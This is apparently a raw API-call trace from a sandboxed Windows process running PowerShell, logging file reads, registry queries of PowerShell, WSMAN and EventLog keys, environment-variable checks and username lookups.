	[0758.080] GetFileType (hFile=0x198) returned 0x1
	[0758.080] ReadFile (in: hFile=0x198, lpBuffer=0x308bb18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308bb18*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.081] ReadFile (in: hFile=0x198, lpBuffer=0x308bb18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308bb18*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.081] ReadFile (in: hFile=0x198, lpBuffer=0x308bb18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308bb18*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.081] ReadFile (in: hFile=0x198, lpBuffer=0x308bb18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308bb18*, lpNumberOfBytesRead=0xccfd8*=0x1000, lpOverlapped=0x0) returned 1
	[0758.081] ReadFile (in: hFile=0x198, lpBuffer=0x308bb18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308bb18*, lpNumberOfBytesRead=0xccfd8*=0xe98, lpOverlapped=0x0) returned 1
	[0759.353] ReadFile (in: hFile=0x198, lpBuffer=0x308b118, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308b118*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0759.353] ReadFile (in: hFile=0x198, lpBuffer=0x308bb18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccfd8, lpOverlapped=0x0 | out: lpBuffer=0x308bb18*, lpNumberOfBytesRead=0xccfd8*=0x0, lpOverlapped=0x0) returned 1
	[0759.354] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd068 | out: phkResult=0xcd068*=0x198) returned 0x0
	[0759.354] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfec, lpData=0x0, lpcbData=0xccfe8*=0x0 | out: lpType=0xccfec*=0x1, lpData=0x0, lpcbData=0xccfe8*=0x56) returned 0x0
	[0759.354] CoTaskMemAlloc (cb=0x5a) returned 0x286c4e0
	[0759.354] RegQueryValueExW (in: hKey=0x198, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccfbc, lpData=0x286c4e0, lpcbData=0xccfb8*=0x56 | out: lpType=0xccfbc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccfb8*=0x56) returned 0x0
	[0759.354] CoTaskMemFree (pv=0x286c4e0) 
	[0759.354] RegCloseKey (hKey=0x198) returned 0x0
	[0759.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcccb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0759.354] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccb60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0759.355] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x3110a5d2, Data2=0xffe7, Data3=0x4356, Data4=([0]=0x8f, [1]=0xb0, [2]=0x8b, [3]=0x4f, [4]=0x4c, [5]=0x38, [6]=0xb9, [7]=0x34))) returned 0x0
	[0759.355] CoCreateGuid (in: pguid=0xcd290 | out: pguid=0xcd290*(Data1=0x24136d4c, Data2=0xd59d, Data3=0x4d2d, Data4=([0]=0x93, [1]=0xa2, [2]=0xe7, [3]=0x20, [4]=0x25, [5]=0xa4, [6]=0x1b, [7]=0x1d))) returned 0x0
	[0759.370] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.370] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.370] CoTaskMemFree (pv=0x1f3950) 
	[0759.371] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.371] CoTaskMemFree (pv=0x1f3950) 
	[0759.371] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.371] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.371] CoTaskMemFree (pv=0x1f3950) 
	[0759.372] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.372] CoTaskMemFree (pv=0x1f3950) 
	[0759.375] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.375] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.375] CoTaskMemFree (pv=0x1f3950) 
	[0759.376] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.376] CoTaskMemFree (pv=0x1f3950) 
	[0759.376] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0759.376] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0759.377] CoTaskMemFree (pv=0x1f3950) 
	[0759.381] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd278 | out: phkResult=0xcd278*=0x198) returned 0x0
	[0759.382] RegQueryInfoKeyW (in: hKey=0x198, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd17c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd178, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd17c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd178*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0759.382] CoTaskMemFree (pv=0x0) 
	[0759.383] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0759.383] RegEnumValueW (in: hKey=0x198, dwIndex=0x0, lpValueName=0x22e660, lpcchValueName=0xcd228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0759.383] CoTaskMemFree (pv=0x22e660) 
	[0759.383] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0759.384] RegEnumValueW (in: hKey=0x198, dwIndex=0x1, lpValueName=0x22e660, lpcchValueName=0xcd228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0759.384] CoTaskMemFree (pv=0x22e660) 
	[0759.384] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0759.384] RegEnumValueW (in: hKey=0x198, dwIndex=0x2, lpValueName=0x22e660, lpcchValueName=0xcd228, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd228, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0759.384] CoTaskMemFree (pv=0x22e660) 
	[0760.692] RegQueryValueExW (in: hKey=0x198, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd20c, lpData=0x0, lpcbData=0xcd208*=0x0 | out: lpType=0xcd20c*=0x1, lpData=0x0, lpcbData=0xcd208*=0x8) returned 0x0
	[0760.692] CoTaskMemAlloc (cb=0xc) returned 0x2a6630
	[0760.692] RegQueryValueExW (in: hKey=0x198, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd1dc, lpData=0x2a6630, lpcbData=0xcd1d8*=0x8 | out: lpType=0xcd1dc*=0x1, lpData="2.0", lpcbData=0xcd1d8*=0x8) returned 0x0
	[0760.693] CoTaskMemFree (pv=0x2a6630) 
	[0770.011] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1c8 | out: phkResult=0xcd1c8*=0x314) returned 0x0
	[0770.011] RegQueryInfoKeyW (in: hKey=0x314, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0cc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0c8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0cc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0c8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.011] CoTaskMemFree (pv=0x0) 
	[0770.012] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.012] RegEnumValueW (in: hKey=0x314, dwIndex=0x0, lpValueName=0x22e660, lpcchValueName=0xcd178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0770.012] CoTaskMemFree (pv=0x22e660) 
	[0770.012] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.012] RegEnumValueW (in: hKey=0x314, dwIndex=0x1, lpValueName=0x22e660, lpcchValueName=0xcd178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0770.012] CoTaskMemFree (pv=0x22e660) 
	[0770.012] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.012] RegEnumValueW (in: hKey=0x314, dwIndex=0x2, lpValueName=0x22e660, lpcchValueName=0xcd178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0770.012] CoTaskMemFree (pv=0x22e660) 
	[0770.012] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd15c, lpData=0x0, lpcbData=0xcd158*=0x0 | out: lpType=0xcd15c*=0x1, lpData=0x0, lpcbData=0xcd158*=0x8) returned 0x0
	[0770.012] CoTaskMemAlloc (cb=0xc) returned 0x2a6430
	[0770.012] RegQueryValueExW (in: hKey=0x314, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd12c, lpData=0x2a6430, lpcbData=0xcd128*=0x8 | out: lpType=0xcd12c*=0x1, lpData="2.0", lpcbData=0xcd128*=0x8) returned 0x0
	[0770.012] CoTaskMemFree (pv=0x2a6430) 
	[0770.014] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0770.014] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0770.014] CoTaskMemFree (pv=0x1f3950) 
	[0770.019] CoTaskMemAlloc (cb=0x104) returned 0x1f3950
	[0770.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f3950, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0770.019] CoTaskMemFree (pv=0x1f3950) 
	[0770.025] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1f8 | out: phkResult=0xcd1f8*=0x318) returned 0x0
	[0770.029] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd16c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd168*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.029] CoTaskMemFree (pv=0x0) 
	[0770.030] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.030] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x0, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.030] CoTaskMemFree (pv=0x22e660) 
	[0770.030] CoTaskMemFree (pv=0x0) 
	[0770.031] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.031] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x1, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.031] CoTaskMemFree (pv=0x22e660) 
	[0770.031] CoTaskMemFree (pv=0x0) 
	[0770.031] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.031] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x2, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.031] CoTaskMemFree (pv=0x22e660) 
	[0770.031] CoTaskMemFree (pv=0x0) 
	[0770.031] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.031] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x3, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.031] CoTaskMemFree (pv=0x22e660) 
	[0770.031] CoTaskMemFree (pv=0x0) 
	[0770.031] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.031] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x4, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.031] CoTaskMemFree (pv=0x22e660) 
	[0770.031] CoTaskMemFree (pv=0x0) 
	[0770.031] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.031] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x5, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.032] CoTaskMemFree (pv=0x22e660) 
	[0770.032] CoTaskMemFree (pv=0x0) 
	[0770.032] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.032] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x6, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.032] CoTaskMemFree (pv=0x22e660) 
	[0770.032] CoTaskMemFree (pv=0x0) 
	[0770.032] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.032] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x7, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.032] CoTaskMemFree (pv=0x22e660) 
	[0770.032] CoTaskMemFree (pv=0x0) 
	[0770.032] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0770.032] RegEnumKeyExW (in: hKey=0x318, dwIndex=0x8, lpName=0x22e660, lpcchName=0xcd1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0770.032] CoTaskMemFree (pv=0x22e660) 
	[0770.032] CoTaskMemFree (pv=0x0) 
	[0770.032] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x31c) returned 0x0
	[0770.033] RegOpenKeyExW (in: hKey=0x31c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.033] RegOpenKeyExW (in: hKey=0x318, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x320) returned 0x0
	[0770.033] RegOpenKeyExW (in: hKey=0x320, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.033] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x324) returned 0x0
	[0770.033] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.033] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x328) returned 0x0
	[0770.033] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.033] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x32c) returned 0x0
	[0770.033] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.034] RegOpenKeyExW (in: hKey=0x318, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x330) returned 0x0
	[0770.034] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.034] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x334) returned 0x0
	[0770.034] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.034] RegOpenKeyExW (in: hKey=0x318, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x338) returned 0x0
	[0770.034] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x0) returned 0x2
	[0770.034] RegOpenKeyExW (in: hKey=0x318, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x33c) returned 0x0
	[0770.034] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd258 | out: phkResult=0xcd258*=0x340) returned 0x0
	[0770.631] RegCloseKey (hKey=0x340) returned 0x0
	[0770.631] RegCloseKey (hKey=0x318) returned 0x0
	[0770.632] RegCloseKey (hKey=0x33c) returned 0x0
	[0771.787] CoTaskMemAlloc (cb=0x804) returned 0x2884c40
	[0771.787] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2884c40, nSize=0xcd468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd468) returned 0x1
	[0772.051] CoTaskMemFree (pv=0x2884c40) 
	[0772.053] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0772.053] GetUserNameW (in: lpBuffer=0x22e660, pcbBuffer=0xcd4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd4a8) returned 1
	[0772.053] CoTaskMemFree (pv=0x22e660) 
	[0773.964] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1a8 | out: phkResult=0xcd1a8*=0x344) returned 0x0
	[0773.964] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.964] CoTaskMemFree (pv=0x0) 
	[0773.964] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.964] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.964] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.965] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.965] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.965] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.965] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.965] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.965] CoTaskMemFree (pv=0x22e660) 
	[0773.965] CoTaskMemFree (pv=0x0) 
	[0773.965] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.965] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.966] CoTaskMemFree (pv=0x22e660) 
	[0773.966] CoTaskMemFree (pv=0x0) 
	[0773.966] CoTaskMemAlloc (cb=0x204) returned 0x22e660
	[0773.966] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x22e660, lpcchName=0xcd1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0773.966] CoTaskMemFree (pv=0x22e660) 
	[0773.966] CoTaskMemFree (pv=0x0) 
	[0773.966] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x348) returned 0x0
	[0773.966] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
	[0773.966] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x34c) returned 0x0
	[0773.966] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd208 | out: phkResult=0xcd208*=0x0) returned 0x2
